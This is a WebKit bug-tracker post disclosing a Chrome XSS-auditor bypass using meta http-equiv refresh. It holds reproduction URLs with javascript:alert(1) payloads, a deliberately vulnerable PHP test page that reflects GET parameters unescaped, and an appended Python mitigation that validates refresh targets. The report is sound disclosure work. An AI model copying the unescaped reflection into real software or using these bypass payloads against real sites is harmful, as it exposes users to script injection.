[Webkit-unassigned] [Bug 67091] New: XSS auditor bypass with http-equiv="refresh"
bugzilla-daemon at webkit.org
Sat Aug 27 13:30:16 PDT 2011
https://bugs.webkit.org/show_bug.cgi?id=67091
Summary: XSS auditor bypass with http-equiv="refresh"
Product: WebKit
Version: 528+ (Nightly build)
Platform: Unspecified
OS/Version: Unspecified
Status: NEW
Severity: Normal
Priority: P2
Component: WebKit Misc.
AssignedTo: webkit-unassigned at lists.webkit.org
ReportedBy: abarth at webkit.org
CC: dbates at webkit.org
Blocks: 66579
http://code.google.com/p/chromium/issues/detail?id=94482
Reported by j.terh... at gmail.com, Today (4 hours ago)
VULNERABILITY DETAILS
A basic reflected XSS, using the <meta http-equiv="refresh" /> vector, is allowed by the XSS filter.
VERSION
Chrome Version: 13.0.782.215 m + stable
Operating System: Windows NT 5.1 build 2600 (Windows XP Home Edition Service Pack 3) i586
REPRODUCTION CASE
Place the attached php file in a web accessible directory of a php enabled apache server at http://<host>/xss.php and call:
http://<host>/xss.php?refresh=javascript:alert(1)
The alert is shown and no blocking message is posted to the console. However the call:
http://<host>/xss.php?body=%3Cscript%3Ealert(1)%3C/script%3E
_is_ blocked and the usual blocking message ("Refused to execute a JavaScript script. Source code of script found within request.") is posted to the console. See screenshots refresh.jpg and basic.jpg.
ADDITIONAL:
If line 4 of the php script is changed to:
echo "<meta http-equiv='refresh' content='0; url=javascript:{$_GET['refresh']}' />";
the filter will also miss the reflected XSS if called as follows:
http://<host>/xss.php?refresh=alert(1)
Also if line 4 is changed to:
echo "<meta http-equiv='refresh' {$_GET['refresh']} />";
and called using:
http://<host>/xss.php?refresh=content=%220;%20url=javascript:alert(1)%22
the XSS is also allowed. _However_ if line 4 is changed to:
echo "<meta {$_GET['refresh']} />";
and the call:
http://<host>/xss.php?refresh=http-equiv=%22refresh%22%20content=%220;%20url=javascript:alert(1)%22
is made, the filter WILL detect the XSS (see screenshot refresh2.jpg).
PHP Version: 5.3.5
Apache: Apache/2.2.17 (Win32) compiled with MSVC6
<html>
<?php
if( isset($_GET['refresh']) ) {
    //echo "<meta http-equiv='refresh' content='0; url={$_GET['refresh']}' />";
    echo "<meta http-equiv='refresh' {$_GET['refresh']} />";
    //echo "<meta http-equiv='refresh' content='0; url=javascript:{$_GET['refresh']}' />";
}
?>
<body>
<?php
if( isset($_GET['body']) ) {
    echo $_GET['body'];
}
?>
</body>
</html>
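A server-side mitigation for the vector in the attached script, written here as an added example (it is not part of the report, the attached file, or WebKit): an allowlist check on the refresh target's scheme, followed by attribute escaping when the tag is emitted, so neither the javascript: URL nor the attribute-injection variant survives into the response. The function names and the decision to reject scheme-relative (//host) targets are assumptions made for this example.

```python
import html
from urllib.parse import urlsplit

# Schemes a refresh target may use. Anything else (javascript:, data:,
# vbscript:, ...) is rejected instead of being reflected into the page.
ALLOWED_SCHEMES = {"http", "https"}


def is_safe_refresh_url(url: str) -> bool:
    """True if `url` is a relative path or an absolute http(s) URL.

    Mimics the browser URL parser's preprocessing before checking the
    scheme: leading/trailing C0 controls and spaces are stripped and any
    tab or newline is removed, so "  javascript:alert(1)" and
    "java\\tscript:alert(1)" are recognised as javascript: URLs. Any other
    control character still present fails validation outright.
    """
    if not url:
        return False
    cleaned = url.strip("".join(chr(c) for c in range(0x21)))
    cleaned = cleaned.replace("\t", "").replace("\n", "").replace("\r", "")
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in cleaned):
        return False
    parts = urlsplit(cleaned)  # scheme is lowercased, so JaVaScRiPt: is caught
    if parts.scheme:
        return parts.scheme in ALLOWED_SCHEMES
    # No scheme: accept a plain relative path, but not "//host/..." which
    # would redirect off-site (assumption: the app only wants same-site paths).
    return not parts.netloc


def render_refresh_meta(url: str, delay: int = 0) -> str:
    """Build the <meta http-equiv=refresh> tag for a validated target.

    Raises ValueError when the target fails validation. The URL is
    attribute-escaped (quotes included) so it cannot close content="..."
    and smuggle in further attributes, and so an entity-encoded scheme
    such as javascript&#58; is not decoded by the HTML parser.
    """
    if not is_safe_refresh_url(url):
        raise ValueError("refresh target must be a relative path or http(s) URL")
    target = html.escape(url, quote=True)
    return f'<meta http-equiv="refresh" content="{int(delay)}; url={target}">'


if __name__ == "__main__":
    # Constructed inputs mirroring the report's reproduction URLs (decoded).
    for candidate in ["javascript:alert(1)", "/home?tab=1", "https://example.com/"]:
        print(candidate, "->", "allowed" if is_safe_refresh_url(candidate) else "rejected")
```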